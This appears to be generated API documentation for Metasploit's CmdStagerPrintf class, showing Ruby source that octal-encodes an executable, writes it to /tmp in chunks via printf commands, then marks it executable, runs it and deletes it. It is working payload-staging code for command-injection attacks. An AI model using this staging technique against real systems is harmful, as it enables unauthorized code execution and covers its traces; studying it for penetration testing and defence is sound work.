class Rex::Exploitation::CmdStagerPrintf
Public Class Methods
new(exe)
click to toggle source
Calls superclass method
Rex::Exploitation::CmdStagerBase::new
# File lib/rex/exploitation/cmdstager/printf.rb, line 12 def initialize(exe) super @var_elf = Rex::Text.rand_text_alpha(5) end
Public Instance Methods
cmd_concat_operator()
click to toggle source
# File lib/rex/exploitation/cmdstager/printf.rb, line 115 def cmd_concat_operator " ; " end
encode_payload(opts)
click to toggle source
Encode into a “12345” octal format that printf understands
# File lib/rex/exploitation/cmdstager/printf.rb, line 57 def encode_payload(opts) return Rex::Text.to_octal(@exe, @prefix) end
generate(opts = {})
click to toggle source
Override to ensure opts is a correct *nix path
Calls superclass method
Rex::Exploitation::CmdStagerBase#generate
# File lib/rex/exploitation/cmdstager/printf.rb, line 21 def generate(opts = {}) opts[:temp] = opts[:temp] || '/tmp/' opts[:temp].gsub!(/\\/, '/') opts[:temp] = opts[:temp].shellescape opts[:temp] << '/' if opts[:temp][-1,1] != '/' super end
generate_cmds(opts)
click to toggle source
Override to set the extra byte count
Calls superclass method
Rex::Exploitation::CmdStagerBase#generate_cmds
# File lib/rex/exploitation/cmdstager/printf.rb, line 32 def generate_cmds(opts) if opts[:noquotes] @cmd_start = "printf " @cmd_end = ">>#{@tempdir}#{@var_elf}" @prefix = '\\\\' min_part_size = 5 else @cmd_start = "printf '" @cmd_end = "'>>#{@tempdir}#{@var_elf}" @prefix = '\\' min_part_size = 4 end xtra_len = @cmd_start.length + @cmd_end.length opts.merge!({ :extra => xtra_len }) if (opts[:linemax] - opts[:extra]) < min_part_size raise RuntimeError, "Not enough space for command - #{opts[:extra] + min_part_size} byte required, #{opts[:linemax]} byte available" end super end
generate_cmds_decoder(opts)
click to toggle source
Since the binary has been already dropped to disk, just execute and delete it
# File lib/rex/exploitation/cmdstager/printf.rb, line 101 def generate_cmds_decoder(opts) cmds = [] # Make it all happen cmds << "chmod +x #{@tempdir}#{@var_elf}" cmds << "#{@tempdir}#{@var_elf}" # Clean up after unless requested not to.. unless opts[:nodelete] cmds << "rm -f #{@tempdir}#{@var_elf}" end return cmds end
parts_to_commands(parts, opts)
click to toggle source
Combine the parts of the encoded file with the stuff that goes before and after it.
# File lib/rex/exploitation/cmdstager/printf.rb, line 91 def parts_to_commands(parts, opts) parts.map do |p| @cmd_start + p + @cmd_end end end
slice_up_payload(encoded, opts)
click to toggle source
Override it to ensure that the octal representation of a byte isn’t cut
# File lib/rex/exploitation/cmdstager/printf.rb, line 64 def slice_up_payload(encoded, opts) encoded_dup = encoded.dup parts = [] xtra_len = opts[:extra] xtra_len ||= 0 while (encoded_dup.length > 0) temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len)) # remove the last octal escape if it is imcomplete if encoded_dup.length > temp.length and encoded_dup[temp.length, @prefix.length] != @prefix pos = temp.rindex('\\') pos -= 1 if temp[pos-1] == '\\' temp.slice!(pos..temp.length-1) end parts << temp encoded_dup.slice!(0, temp.length) end parts end